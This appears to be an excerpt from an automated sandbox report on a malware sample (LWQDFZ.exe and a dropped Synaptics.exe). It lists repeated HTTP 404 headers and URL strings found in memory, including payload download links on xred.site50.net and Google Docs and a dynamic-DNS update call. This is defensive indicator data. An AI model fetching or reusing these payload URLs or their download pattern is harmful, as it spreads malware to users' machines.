                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6hjBmZTql2QpgMf36Z3m_jYTUCj-P6RTCIY_t8n8ZRm8Thm3VIi-SA-S6EEokzVAUHufF0yIcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:59 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-69ejyhKWHaU-IZFje0txeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC43wxTFGryaZ44jby1-dov6rtF4nw6NYS6O-AiUe-a2QUqaoZnI4E10zci_AhnpHoMnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:00 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Sptt28XtNp1l3jR_vTbVHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7QXvsmAJN7IHVDbK0q8d866LU_NSSUkIZU7HZYG8bX2qI0DBTMGDvms3zRPOYTeF92-1ZS54QContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:00 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0Mv845j50wSf1CKQUkxzlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6_3v9E3Uv6PltVdxHDqNY53sZ_h9UjqMFqSjVOYSwlSsolWaBAuQnxZfpHCvkqJeBjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:02 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9_dYsm2cApJwMtu1Pcs3FQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5fgCE-izE8UJ3wqfSLfseAa0hRGqbhEua142We6KsOT-ahhgMeNgyrSZSzp4-V_-XaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:02 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-nirHLKwqxJuop_JKW-CfVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4QxqiKOkZuS-UvkoUG3LrBF6IJSTDA_d9Dg18Kr_G9yeCRdvSQ_Ar5BfGXbGjJOVn8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:03 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-gT_lwTRXHIZ-OxIsoXAMiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6AfcXctw8OgvHTp0-bdh0lww4MbiM-dLV7SO4RBu8-O1T-QgFuZMF0R-jpMaiPp78aContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:03 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-e69MbAD3XGAf34Zo2TYf2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7VWe34AD78lPHMwQg7A1Tp3wGgJ7RG__3hoWE_iAhMeqWH6cHmGLnI74VSUWJK_vjpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:04 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-xugerl6kd424cCCaLfYDtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7L1mCsmc44ZvaSkVv1FsBpRw8pzGV1Zu7V6Feze5ZGhpV9Ah9zrUXpxuR4ZotRFgr0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:04 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pLjXBePujxr5eJvcEacDFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: LWQDFZ.exeString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000071A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978_
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
                              Source: ._cache_LWQDFZ.exe, 00000002.00000002.3036420870.00000000041C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/108392S17108385S17108460
                              Source: Amcache.hve.23.drString found in binary or memory: http://upx.sf.net
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
                              Source: LWQDFZ.exeString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: LWQDFZ.exeString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: LWQDFZ.exeString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
                              Source: Synaptics.exe, 00000003.00000003.1612400526.0000000005AA7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.000000000072D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000003.1612400526.0000000005AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/googletagservices-cn.com
                              Source: Synaptics.exe, 00000003.00000003.1612400526.0000000005AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/leclick-cn.net
                              Source: Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/t1.c
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0B
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: LWQDFZ.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: LWQDFZ.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download28
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2H
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2P3
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2YI
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3F
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3T2
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3Zp
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4;
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4S5
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4px;
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5%
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download54
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5I
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6$
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6D
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6H
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6z
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download77
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7o6
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8%1
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8I
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download98
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9P8
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9z
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:7
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:F
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:K
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:Xq
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:_
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:o;
